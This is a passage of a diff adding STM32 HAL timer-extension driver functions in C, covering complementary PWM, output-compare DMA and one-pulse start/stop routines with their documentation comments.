TIM_CHANNEL_N_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_BUSY); + } + } + else + { + return HAL_ERROR; + } + + switch (Channel) + { + case TIM_CHANNEL_1: + { + /* Set the DMA compare callbacks */ + htim->hdma[TIM_DMA_ID_CC1]->XferCpltCallback = TIM_DMADelayPulseNCplt; + htim->hdma[TIM_DMA_ID_CC1]->XferHalfCpltCallback = TIM_DMADelayPulseHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC1]->XferErrorCallback = TIM_DMAErrorCCxN ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC1], (uint32_t)pData, (uint32_t)&htim->Instance->CCR1, + Length) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + /* Enable the TIM Output Compare DMA request */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_CC1); + break; + } + + case TIM_CHANNEL_2: + { + /* Set the DMA compare callbacks */ + htim->hdma[TIM_DMA_ID_CC2]->XferCpltCallback = TIM_DMADelayPulseNCplt; + htim->hdma[TIM_DMA_ID_CC2]->XferHalfCpltCallback = TIM_DMADelayPulseHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC2]->XferErrorCallback = TIM_DMAErrorCCxN ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC2], (uint32_t)pData, (uint32_t)&htim->Instance->CCR2, + Length) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + /* Enable the TIM Output Compare DMA request */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_CC2); + break; + } + + case TIM_CHANNEL_3: + { + /* Set the DMA compare callbacks */ + htim->hdma[TIM_DMA_ID_CC3]->XferCpltCallback = TIM_DMADelayPulseNCplt; + htim->hdma[TIM_DMA_ID_CC3]->XferHalfCpltCallback = TIM_DMADelayPulseHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC3]->XferErrorCallback = TIM_DMAErrorCCxN ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC3], (uint32_t)pData, (uint32_t)&htim->Instance->CCR3, + Length) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + /* Enable the TIM Output Compare DMA request */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_CC3); + break; + } + + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + /* Enable the Capture compare channel N */ + TIM_CCxNChannelCmd(htim->Instance, Channel, TIM_CCxN_ENABLE); + + /* Enable the Main Output */ + __HAL_TIM_MOE_ENABLE(htim); + + /* Enable the Peripheral, except in trigger mode where enable is automatically done with trigger */ + if (IS_TIM_SLAVE_INSTANCE(htim->Instance)) + { + tmpsmcr = htim->Instance->SMCR & TIM_SMCR_SMS; + if (!IS_TIM_SLAVEMODE_TRIGGER_ENABLED(tmpsmcr)) + { + __HAL_TIM_ENABLE(htim); + } + } + else + { + __HAL_TIM_ENABLE(htim); + } + } + + /* Return function status */ + return status; +} + +/** + * @brief Stops the TIM Output Compare signal generation in DMA mode + * on the complementary output. + * @param htim TIM Output Compare handle + * @param Channel TIM Channel to be disabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_OCN_Stop_DMA(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_TIM_CCXN_INSTANCE(htim->Instance, Channel)); + + switch (Channel) + { + case TIM_CHANNEL_1: + { + /* Disable the TIM Output Compare DMA request */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_CC1); + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC1]); + break; + } + + case TIM_CHANNEL_2: + { + /* Disable the TIM Output Compare DMA request */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_CC2); + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC2]); + break; + } + + case TIM_CHANNEL_3: + { + /* Disable the TIM Output Compare DMA request */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_CC3); + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC3]); + break; + } + + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + /* Disable the Capture compare channel N */ + TIM_CCxNChannelCmd(htim->Instance, Channel, TIM_CCxN_DISABLE); + + /* Disable the Main Output */ + __HAL_TIM_MOE_DISABLE(htim); + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM complementary channel state */ + TIM_CHANNEL_N_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_READY); + } + + /* Return function status */ + return status; +} + +/** + * @} + */ + +/** @defgroup TIMEx_Exported_Functions_Group3 Extended Timer Complementary PWM functions + * @brief Timer Complementary PWM functions + * +@verbatim + ============================================================================== + ##### Timer Complementary PWM functions ##### + ============================================================================== + [..] + This section provides functions allowing to: + (+) Start the Complementary PWM. + (+) Stop the Complementary PWM. + (+) Start the Complementary PWM and enable interrupts. + (+) Stop the Complementary PWM and disable interrupts. + (+) Start the Complementary PWM and enable DMA transfers. + (+) Stop the Complementary PWM and disable DMA transfers. + (+) Start the Complementary Input Capture measurement. + (+) Stop the Complementary Input Capture. + (+) Start the Complementary Input Capture and enable interrupts. + (+) Stop the Complementary Input Capture and disable interrupts. + (+) Start the Complementary Input Capture and enable DMA transfers. + (+) Stop the Complementary Input Capture and disable DMA transfers. + (+) Start the Complementary One Pulse generation. + (+) Stop the Complementary One Pulse. + (+) Start the Complementary One Pulse and enable interrupts. + (+) Stop the Complementary One Pulse and disable interrupts. + +@endverbatim + * @{ + */ + +/** + * @brief Starts the PWM signal generation on the complementary output. + * @param htim TIM handle + * @param Channel TIM Channel to be enabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_PWMN_Start(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + uint32_t tmpsmcr; + + /* Check the parameters */ + assert_param(IS_TIM_CCXN_INSTANCE(htim->Instance, Channel)); + + /* Check the TIM complementary channel state */ + if (TIM_CHANNEL_N_STATE_GET(htim, Channel) != HAL_TIM_CHANNEL_STATE_READY) + { + return HAL_ERROR; + } + + /* Set the TIM complementary channel state */ + TIM_CHANNEL_N_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_BUSY); + + /* Enable the complementary PWM output */ + TIM_CCxNChannelCmd(htim->Instance, Channel, TIM_CCxN_ENABLE); + + /* Enable the Main Output */ + __HAL_TIM_MOE_ENABLE(htim); + + /* Enable the Peripheral, except in trigger mode where enable is automatically done with trigger */ + if (IS_TIM_SLAVE_INSTANCE(htim->Instance)) + { + tmpsmcr = htim->Instance->SMCR & TIM_SMCR_SMS; + if (!IS_TIM_SLAVEMODE_TRIGGER_ENABLED(tmpsmcr)) + { + __HAL_TIM_ENABLE(htim); + } + } + else + { + __HAL_TIM_ENABLE(htim); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stops the PWM signal generation on the complementary output. + * @param htim TIM handle + * @param Channel TIM Channel to be disabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_PWMN_Stop(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + /* Check the parameters */ + assert_param(IS_TIM_CCXN_INSTANCE(htim->Instance, Channel)); + + /* Disable the complementary PWM output */ + TIM_CCxNChannelCmd(htim->Instance, Channel, TIM_CCxN_DISABLE); + + /* Disable the Main Output */ + __HAL_TIM_MOE_DISABLE(htim); + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM complementary channel state */ + TIM_CHANNEL_N_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_READY); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Starts the PWM signal generation in interrupt mode on the + * complementary output. + * @param htim TIM handle + * @param Channel TIM Channel to be disabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_PWMN_Start_IT(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t tmpsmcr; + + /* Check the parameters */ + assert_param(IS_TIM_CCXN_INSTANCE(htim->Instance, Channel)); + + /* Check the TIM complementary channel state */ + if (TIM_CHANNEL_N_STATE_GET(htim, Channel) != HAL_TIM_CHANNEL_STATE_READY) + { + return HAL_ERROR; + } + + /* Set the TIM complementary channel state */ + TIM_CHANNEL_N_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_BUSY); + + switch (Channel) + { + case TIM_CHANNEL_1: + { + /* Enable the TIM Capture/Compare 1 interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC1); + break; + } + + case TIM_CHANNEL_2: + { + /* Enable the TIM Capture/Compare 2 interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC2); + break; + } + + case TIM_CHANNEL_3: + { + /* Enable the TIM Capture/Compare 3 interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC3); + break; + } + + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + /* Enable the TIM Break interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_BREAK); + + /* Enable the complementary PWM output */ + TIM_CCxNChannelCmd(htim->Instance, Channel, TIM_CCxN_ENABLE); + + /* Enable the Main Output */ + __HAL_TIM_MOE_ENABLE(htim); + + /* Enable the Peripheral, except in trigger mode where enable is automatically done with trigger */ + if (IS_TIM_SLAVE_INSTANCE(htim->Instance)) + { + tmpsmcr = htim->Instance->SMCR & TIM_SMCR_SMS; + if (!IS_TIM_SLAVEMODE_TRIGGER_ENABLED(tmpsmcr)) + { + __HAL_TIM_ENABLE(htim); + } + } + else + { + __HAL_TIM_ENABLE(htim); + } + } + + /* Return function status */ + return status; +} + +/** + * @brief Stops the PWM signal generation in interrupt mode on the + * complementary output. + * @param htim TIM handle + * @param Channel TIM Channel to be disabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_PWMN_Stop_IT(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t tmpccer; + + /* Check the parameters */ + assert_param(IS_TIM_CCXN_INSTANCE(htim->Instance, Channel)); + + switch (Channel) + { + case TIM_CHANNEL_1: + { + /* Disable the TIM Capture/Compare 1 interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC1); + break; + } + + case TIM_CHANNEL_2: + { + /* Disable the TIM Capture/Compare 2 interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC2); + break; + } + + case TIM_CHANNEL_3: + { + /* Disable the TIM Capture/Compare 3 interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC3); + break; + } + + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + /* Disable the complementary PWM output */ + TIM_CCxNChannelCmd(htim->Instance, Channel, TIM_CCxN_DISABLE); + + /* Disable the TIM Break interrupt (only if no more channel is active) */ + tmpccer = htim->Instance->CCER; + if ((tmpccer & (TIM_CCER_CC1NE | TIM_CCER_CC2NE | TIM_CCER_CC3NE)) == (uint32_t)RESET) + { + __HAL_TIM_DISABLE_IT(htim, TIM_IT_BREAK); + } + + /* Disable the Main Output */ + __HAL_TIM_MOE_DISABLE(htim); + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM complementary channel state */ + TIM_CHANNEL_N_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_READY); + } + + /* Return function status */ + return status; +} + +/** + * @brief Starts the TIM PWM signal generation in DMA mode on the + * complementary output + * @param htim TIM handle + * @param Channel TIM Channel to be enabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @param pData The source Buffer address. + * @param Length The length of data to be transferred from memory to TIM peripheral + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_PWMN_Start_DMA(TIM_HandleTypeDef *htim, uint32_t Channel, uint32_t *pData, uint16_t Length) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t tmpsmcr; + + /* Check the parameters */ + assert_param(IS_TIM_CCXN_INSTANCE(htim->Instance, Channel)); + + /* Set the TIM complementary channel state */ + if (TIM_CHANNEL_N_STATE_GET(htim, Channel) == HAL_TIM_CHANNEL_STATE_BUSY) + { + return HAL_BUSY; + } + else if (TIM_CHANNEL_N_STATE_GET(htim, Channel) == HAL_TIM_CHANNEL_STATE_READY) + { + if ((pData == NULL) && (Length > 0U)) + { + return HAL_ERROR; + } + else + { + TIM_CHANNEL_N_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_BUSY); + } + } + else + { + return HAL_ERROR; + } + + switch (Channel) + { + case TIM_CHANNEL_1: + { + /* Set the DMA compare callbacks */ + htim->hdma[TIM_DMA_ID_CC1]->XferCpltCallback = TIM_DMADelayPulseNCplt; + htim->hdma[TIM_DMA_ID_CC1]->XferHalfCpltCallback = TIM_DMADelayPulseHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC1]->XferErrorCallback = TIM_DMAErrorCCxN ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC1], (uint32_t)pData, (uint32_t)&htim->Instance->CCR1, + Length) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + /* Enable the TIM Capture/Compare 1 DMA request */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_CC1); + break; + } + + case TIM_CHANNEL_2: + { + /* Set the DMA compare callbacks */ + htim->hdma[TIM_DMA_ID_CC2]->XferCpltCallback = TIM_DMADelayPulseNCplt; + htim->hdma[TIM_DMA_ID_CC2]->XferHalfCpltCallback = TIM_DMADelayPulseHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC2]->XferErrorCallback = TIM_DMAErrorCCxN ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC2], (uint32_t)pData, (uint32_t)&htim->Instance->CCR2, + Length) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + /* Enable the TIM Capture/Compare 2 DMA request */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_CC2); + break; + } + + case TIM_CHANNEL_3: + { + /* Set the DMA compare callbacks */ + htim->hdma[TIM_DMA_ID_CC3]->XferCpltCallback = TIM_DMADelayPulseNCplt; + htim->hdma[TIM_DMA_ID_CC3]->XferHalfCpltCallback = TIM_DMADelayPulseHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC3]->XferErrorCallback = TIM_DMAErrorCCxN ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC3], (uint32_t)pData, (uint32_t)&htim->Instance->CCR3, + Length) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + /* Enable the TIM Capture/Compare 3 DMA request */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_CC3); + break; + } + + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + /* Enable the complementary PWM output */ + TIM_CCxNChannelCmd(htim->Instance, Channel, TIM_CCxN_ENABLE); + + /* Enable the Main Output */ + __HAL_TIM_MOE_ENABLE(htim); + + /* Enable the Peripheral, except in trigger mode where enable is automatically done with trigger */ + if (IS_TIM_SLAVE_INSTANCE(htim->Instance)) + { + tmpsmcr = htim->Instance->SMCR & TIM_SMCR_SMS; + if (!IS_TIM_SLAVEMODE_TRIGGER_ENABLED(tmpsmcr)) + { + __HAL_TIM_ENABLE(htim); + } + } + else + { + __HAL_TIM_ENABLE(htim); + } + } + + /* Return function status */ + return status; +} + +/** + * @brief Stops the TIM PWM signal generation in DMA mode on the complementary + * output + * @param htim TIM handle + * @param Channel TIM Channel to be disabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_PWMN_Stop_DMA(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_TIM_CCXN_INSTANCE(htim->Instance, Channel)); + + switch (Channel) + { + case TIM_CHANNEL_1: + { + /* Disable the TIM Capture/Compare 1 DMA request */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_CC1); + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC1]); + break; + } + + case TIM_CHANNEL_2: + { + /* Disable the TIM Capture/Compare 2 DMA request */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_CC2); + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC2]); + break; + } + + case TIM_CHANNEL_3: + { + /* Disable the TIM Capture/Compare 3 DMA request */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_CC3); + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC3]); + break; + } + + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + /* Disable the complementary PWM output */ + TIM_CCxNChannelCmd(htim->Instance, Channel, TIM_CCxN_DISABLE); + + /* Disable the Main Output */ + __HAL_TIM_MOE_DISABLE(htim); + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM complementary channel state */ + TIM_CHANNEL_N_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_READY); + } + + /* Return function status */ + return status; +} + +/** + * @} + */ + +/** @defgroup TIMEx_Exported_Functions_Group4 Extended Timer Complementary One Pulse functions + * @brief Timer Complementary One Pulse functions + * +@verbatim + ============================================================================== + ##### Timer Complementary One Pulse functions ##### + ============================================================================== + [..] + This section provides functions allowing to: + (+) Start the Complementary One Pulse generation. + (+) Stop the Complementary One Pulse. + (+) Start the Complementary One Pulse and enable interrupts. + (+) Stop the Complementary One Pulse and disable interrupts. + +@endverbatim + * @{ + */ + +/** + * @brief Starts the TIM One Pulse signal generation on the complementary + * output. + * @note OutputChannel must match the pulse output channel chosen when calling + * @ref HAL_TIM_OnePulse_ConfigChannel(). + * @param htim TIM One Pulse handle + * @param OutputChannel pulse output channel to enable + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_OnePulseN_Start(TIM_HandleTypeDef *htim, uint32_t OutputChannel) +{ + uint32_t input_channel = (OutputChannel == TIM_CHANNEL_1) ? TIM_CHANNEL_2 : TIM_CHANNEL_1; + HAL_TIM_ChannelStateTypeDef channel_1_state = TIM_CHANNEL_STATE_GET(htim, TIM_CHANNEL_1); + HAL_TIM_ChannelStateTypeDef channel_2_state = TIM_CHANNEL_STATE_GET(htim, TIM_CHANNEL_2); + HAL_TIM_ChannelStateTypeDef complementary_channel_1_state = TIM_CHANNEL_N_STATE_GET(htim, TIM_CHANNEL_1); + HAL_TIM_ChannelStateTypeDef complementary_channel_2_state = TIM_CHANNEL_N_STATE_GET(htim, TIM_CHANNEL_2); + + /* Check the parameters */ + assert_param(IS_TIM_CCXN_INSTANCE(htim->Instance, OutputChannel)); + + /* Check the TIM channels state */ + if ((channel_1_state != HAL_TIM_CHANNEL_STATE_READY) + || (channel_2_state != HAL_TIM_CHANNEL_STATE_READY) + || (complementary_channel_1_state != HAL_TIM_CHANNEL_STATE_READY) + || (complementary_channel_2_state != HAL_TIM_CHANNEL_STATE_READY)) + { + return HAL_ERROR; + } + + /* Set the TIM channels state */ + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_BUSY); + + /* Enable the complementary One Pulse output channel and the Input Capture channel */ + TIM_CCxNChannelCmd(htim->Instance, OutputChannel, TIM_CCxN_ENABLE); + TIM_CCxChannelCmd(htim->Instance, input_channel, TIM_CCx_ENABLE); + + /* Enable the Main Output */ + __HAL_TIM_MOE_ENABLE(htim); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stops the TIM One Pulse signal generation on the complementary + * output. + * @note OutputChannel must match the pulse output channel chosen when calling + * @ref HAL_TIM_OnePulse_ConfigChannel(). + * @param htim TIM One Pulse handle + * @param OutputChannel pulse output channel to disable + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_OnePulseN_Stop(TIM_HandleTypeDef *htim, uint32_t OutputChannel) +{ + uint32_t input_channel = (OutputChannel == TIM_CHANNEL_1) ? TIM_CHANNEL_2 : TIM_CHANNEL_1; + + /* Check the parameters */ + assert_param(IS_TIM_CCXN_INSTANCE(htim->Instance, OutputChannel)); + + /* Disable the complementary One Pulse output channel and the Input Capture channel */ + TIM_CCxNChannelCmd(htim->Instance, OutputChannel, TIM_CCxN_DISABLE); + TIM_CCxChannelCmd(htim->Instance, input_channel, TIM_CCx_DISABLE); + + /* Disable the Main Output */ + __HAL_TIM_MOE_DISABLE(htim); + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM channels state */ + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Starts the TIM One Pulse signal generation in interrupt mode on the + * complementary channel. + * @note OutputChannel must match the pulse output channel chosen when calling + * @ref HAL_TIM_OnePulse_ConfigChannel(). + * @param htim TIM One Pulse handle + * @param OutputChannel pulse output channel to enable + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_OnePulseN_Start_IT(TIM_HandleTypeDef *htim, uint32_t OutputChannel) +{ + uint32_t input_channel = (OutputChannel == TIM_CHANNEL_1) ? TIM_CHANNEL_2 : TIM_CHANNEL_1; + HAL_TIM_ChannelStateTypeDef channel_1_state = TIM_CHANNEL_STATE_GET(htim, TIM_CHANNEL_1); + HAL_TIM_ChannelStateTypeDef channel_2_state = TIM_CHANNEL_STATE_GET(htim, TIM_CHANNEL_2); + HAL_TIM_ChannelStateTypeDef complementary_channel_1_state = TIM_CHANNEL_N_STATE_GET(htim, TIM_CHANNEL_1); + HAL_TIM_ChannelStateTypeDef complementary_channel_2_state = TIM_CHANNEL_N_STATE_GET(htim, TIM_CHANNEL_2); + + /* Check the parameters */ + assert_param(IS_TIM_CCXN_INSTANCE(htim->Instance, OutputChannel)); + + /* Check the TIM channels state */ + if ((channel_1_state != HAL_TIM_CHANNEL_STATE_READY) + || (channel_2_state != HAL_TIM_CHANNEL_STATE_READY) + || (complementary_channel_1_state != HAL_TIM_CHANNEL_STATE_READY) + || (complementary_channel_2_state != HAL_TIM_CHANNEL_STATE_READY)) + { + return HAL_ERROR; + } + + /* Set the TIM channels state */ + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_BUSY); + + /* Enable the TIM Capture/Compare 1 interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC1); + + /* Enable the TIM Capture/Compare 2 interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC2); + + /* Enable the complementary One Pulse output channel and the Input Capture channel */ + TIM_CCxNChannelCmd(htim->Instance, OutputChannel, TIM_CCxN_ENABLE); + TIM_CCxChannelCmd(htim->Instance, input_channel, TIM_CCx_ENABLE); + + /* Enable the Main Output */ + __HAL_TIM_MOE_ENABLE(htim); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stops the TIM One Pulse signal generation in interrupt mode on the + * complementary channel. + * @note OutputChannel must match the pulse output channel chosen when calling + * @ref HAL_TIM_OnePulse_ConfigChannel(). + * @param htim TIM One Pulse handle + * @param OutputChannel pulse output channel to disable + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_OnePulseN_Stop_IT(TIM_HandleTypeDef *htim, uint32_t OutputChannel) +{ + uint32_t input_channel = (OutputChannel == TIM_CHANNEL_1) ? TIM_CHANNEL_2 : TIM_CHANNEL_1; + + /* Check the parameters */ + assert_param(IS_TIM_CCXN_INSTANCE(htim->Instance, OutputChannel)); + + /* Disable the TIM Capture/Compare 1 interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC1); + + /* Disable the TIM Capture/Compare 2 interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC2); + + /* Disable the complementary One Pulse output channel and the Input Capture channel */ + TIM_CCxNChannelCmd(htim->Instance, OutputChannel, TIM_CCxN_DISABLE); + TIM_CCxChannelCmd(htim->Instance, input_channel, TIM_CCx_DISABLE); + + /* Disable the Main Output */ + __HAL_TIM_MOE_DISABLE(htim); + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM channels state */ + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + + /* Return function status */ + return HAL_OK; +} + +/** + * @} + */ + +/** @defgroup TIMEx_Exported_Functions_Group5 Extended Peripheral Control functions + * @brief Peripheral Control functions + * +@verbatim + ============================================================================== + ##### Peripheral Control functions ##### + ============================================================================== + [..] + This section provides functions allowing to: + (+) Configure the commutation event in case of use of the Hall sensor interface. + (+) Configure Output channels for OC and PWM mode. + + (+) Configure Complementary channels, break features and dead time. + (+) Configure Master synchronization. + (+) Configure timer remapping capabilities. + +@endverbatim + * @{ + */ + +/** + * @brief Configure the TIM commutation event sequence. + * @note This function is mandatory to use the commutation event in order to + * update the configuration at each commutation detection on the TRGI input of the Timer, + * the typical use of this feature is with the use of another Timer(interface Timer) + * configured in Hall sensor interface, this interface Timer will generate the + * commutation at its TRGO output (connected to Timer used in this function) each time + * the TI1 of the Interface Timer detect a commutation at its input TI1. + * @param htim TIM handle + * @param InputTrigger the Internal trigger corresponding to the Timer Interfacing with the Hall sensor + * This parameter can be one of the following values: + * @arg TIM_TS_ITR0: Internal trigger 0 selected + * @arg TIM_TS_ITR1: Internal trigger 1 selected + * @arg TIM_TS_ITR2: Internal trigger 2 selected + * @arg TIM_TS_ITR3: Internal trigger 3 selected + * @arg TIM_TS_NONE: No trigger is needed + * @param CommutationSource the Commutation Event source + * This parameter can be one of the following values: + * @arg TIM_COMMUTATION_TRGI: Commutation source is the TRGI of the Interface Timer + * @arg TIM_COMMUTATION_SOFTWARE: Commutation source is set by software using the COMG bit + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_ConfigCommutEvent(TIM_HandleTypeDef *htim, uint32_t InputTrigger, + uint32_t CommutationSource) +{ + /* Check the parameters */ + 